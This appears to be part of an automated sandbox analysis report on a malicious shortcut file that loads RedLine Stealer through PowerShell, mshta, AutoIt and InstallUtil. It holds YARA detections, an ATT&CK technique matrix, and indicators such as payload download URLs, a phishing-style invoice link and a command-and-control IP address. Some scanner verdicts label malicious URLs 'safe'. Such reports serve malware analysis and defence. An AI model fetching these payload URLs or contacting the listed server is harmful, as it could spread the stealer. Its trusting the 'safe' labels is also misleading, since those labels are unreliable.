Source: AutoIt3.exe, 0000001A.00000002.1910385229.0000000000D36000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 25.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.1833241977.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1908914429.0000000004770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1674485682.0000000004508000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1834778236.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1667401660.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1908716949.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1914811430.0000000003FC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1840944996.00000000041B8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.1833497211.0000000004960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1667521977.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 8800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 9016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 9076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 9132, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 25.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.1833241977.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1908914429.0000000004770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1674485682.0000000004508000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1834778236.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1667401660.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1908716949.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1914811430.0000000003FC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1840944996.00000000041B8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.1833497211.0000000004960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1667521977.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 8800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 9016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 9076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 9132, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0038696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	20_2_0038696E
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_00386E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	20_2_00386E32
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CF696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	22_2_00CF696E
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CF6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	22_2_00CF6E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Create Account	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	1 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	169 System Information Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	11 Masquerading	LSA Secrets	261 Security Software Discovery	SSH	3 Clipboard Data	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	251 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
sEOELQpFOB.lnk	6%	Virustotal		Browse
sEOELQpFOB.lnk	13%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\71532689\updater.exe	3%	ReversingLabs
C:\ehcfdbh\AutoIt3.exe	3%	ReversingLabs

Source	Detection	Scanner	Label
https://cndef1.green-pathways.shop	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.	0%	Avira URL Cloud	safe
https://cndef1.green-pathways.shop/api/uz/7552973650/u.bin	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4$global:?	0%	Avira URL Cloud	safe
https://static.k	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4#	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuh	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4.exeDrive	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4lr	0%	Avira URL Cloud	safe
http://crl.microsP	0%	Avira URL Cloud	safe
http://92.255.57.75:9000	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4H	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4P	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4:	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4T	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4Ku	0%	Avira URL Cloud	safe
https://static.klip	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4return	0%	Avira URL Cloud	safe
http://cndef1.green-pathways.shop	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4/v	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4RRC:	0%	Avira URL Cloud	safe
https://cndef1.green-pathways.shop/api/uz/7552973650/nnn.bin	0%	Avira URL Cloud	safe
http://microsoft.co	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4p	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4s	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp42cU3	0%	Avira URL Cloud	safe
https://login.li	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4vvqb	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4Ec	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp42cv3	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4LMEMP	0%	Avira URL Cloud	safe
http://csp-invoices-v5.com	0%	Avira URL Cloud	safe
https://static.kX	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/1	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4...p7CcN	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4=	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4;	0%	Avira URL Cloud	safe
http://92.255.57.75:9000/wbinjget?q=0CAE766850B2702DDB609BB03263B071	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4if	0%	Avira URL Cloud	safe
http://go.mic	0%	Avira URL Cloud	safe
http://purl.oena	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4X?	0%	Avira URL Cloud	safe
https://csp-invoices-v5.com/pdf/cloudviewer/ref095vq842r70/3rd/party/authorisation/form/20241210/docs/w3/ref095vq842r70_3rd_party_authorisation_form.pdf	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4...x	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4ystem32	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4C:	0%	Avira URL Cloud	safe
https://static.klipxuhaq.shop/3VKKE.mp4private	0%	Avira URL Cloud	safe
https://csp-invoices-v5.com/pdf/cloudviewer/ref095vq842r70/3rd/party/authorisation/form/20241210/doc	0%	Avira URL Cloud	safe
https://csp-invoices-v5.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
csp-invoices-v5.com	83.166.133.91	true	false	unknown
cndef1.green-pathways.shop	188.114.97.6	true	false	unknown
static.klipxuhaq.shop	104.21.48.1	true	true	unknown
x1.i.lencr.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cndef1.green-pathways.shop/api/uz/7552973650/u.bin	false	Avira URL Cloud: safe	unknown
https://cndef1.green-pathways.shop/api/uz/7552973650/nnn.bin	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4	true	Avira URL Cloud: safe	unknown
http://92.255.57.75:9000/wbinjget?q=0CAE766850B2702DDB609BB03263B071	true	Avira URL Cloud: safe	unknown
https://csp-invoices-v5.com/pdf/cloudviewer/ref095vq842r70/3rd/party/authorisation/form/20241210/docs/w3/ref095vq842r70_3rd_party_authorisation_form.pdf	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cndef1.green-pathways.shop	powershell.exe, 0000000B.00000002.1610462862.000002002D854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DF2F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.	powershell.exe, 00000004.00000002.1380328709.0000024F8A420000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4$global:?	powershell.exe	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.k	powershell.exe, 00000005.00000002.1370748747.00000186BBDBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1370748747.00000186BBE17000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4lr	mshta.exe, 00000006.00000003.1579013515.0000024E634C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1585030054.0000024E634D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584947566.0000024E634C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584157195.0000024E634C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1592945632.0000024E634D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsP	powershell.exe, 00000009.00000002.1564802240.0000028DEE77A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuh	mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000009.00000002.1564802240.0000028DEE77A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1450954284.0000028DD4484000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000B.00000002.1728955596.000002003C295000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000008.00000003.1396373449.000001D9292F0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4.exeDrive	mshta.exe, 00000006.00000002.1591751221.0000024660A90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6	powershell.exe, 00000004.00000002.1380328709.0000024F89F61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabS	InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/autoit3/	powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4#	mshta.exe, 00000006.00000003.1579811940.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.0000024660854000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.75:9000	InstallUtil.exe, 00000015.00000002.3807114971.0000000002811000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 00000008.00000003.1396373449.000001D929359000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4H	mshta.exe, 00000006.00000002.1591643960.00000246609D0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4return	mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/gxDS2LkW	InstallUtil.exe, 00000019.00000002.1846497233.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4/v	mshta.exe, 00000006.00000003.1579811940.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.0000024660854000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000B.00000002.1728955596.000002003C295000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.1552097553.0000028DE6458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1452751540.0000028DD67F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1552097553.0000028DE6315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728955596.000002003C3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728955596.000002003C295000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4T	mshta.exe, 00000006.00000002.1591548963.00000246608C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1405418364.00000246608CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1578774556.00000246608A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580506676.00000246608C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cndef1.green-pathways.shop	powershell.exe, 0000000B.00000002.1610462862.000002002DF44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCB1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4P	mshta.exe, 00000006.00000003.1586876351.0000024E67A65000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klip	powershell.exe, 00000005.00000002.1373926203.00000186D39E2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4:	mshta.exe, 00000006.00000002.1594069929.0000024E685B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.c	powershell.exe, 00000009.00000002.1564802240.0000028DEE77A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4Ku	mshta.exe, 00000006.00000003.1579811940.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.0000024660854000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4RRC:	mshta.exe, 00000006.00000003.1579811940.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.0000024660854000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.1380328709.0000024F89FAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1370748747.00000186BB911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1452751540.0000028DD62A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002C221000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002811000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	powershell.exe, 0000000B.00000002.1742082882.00000200443ED000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000000.1778413751.0000000000D49000.00000002.00000001.01000000.00000013.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000002.1910877460.0000000000D49000.00000002.00000001.01000000.00000013.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.1552097553.0000028DE6458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1452751540.0000028DD67F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1552097553.0000028DE6315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728955596.000002003C3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728955596.000002003C295000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4Ec	mshta.exe, 00000006.00000002.1593693710.0000024E67442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1581134267.0000024E673F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580418347.0000024E673EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584038846.0000024E67442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1581330653.0000024E673F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4vvqb	mshta.exe, 00000006.00000003.1586876351.0000024E67A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.1610462862.000002002C454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/gxDS2LkWPOeq5	InstallUtil.exe, 00000019.00000002.1846497233.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	InstallUtil.exe, 00000015.00000002.3807114971.0000000002811000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.1610462862.000002002C454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4p	powershell.exe, 00000005.00000002.1370748747.00000186BB911000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://microsoft.co	powershell.exe, 00000009.00000002.1564802240.0000028DEE77A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000009.00000002.1452751540.0000028DD7486000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002CE54000.00000004.00000800.00020000.00000000.sdmp	false		high
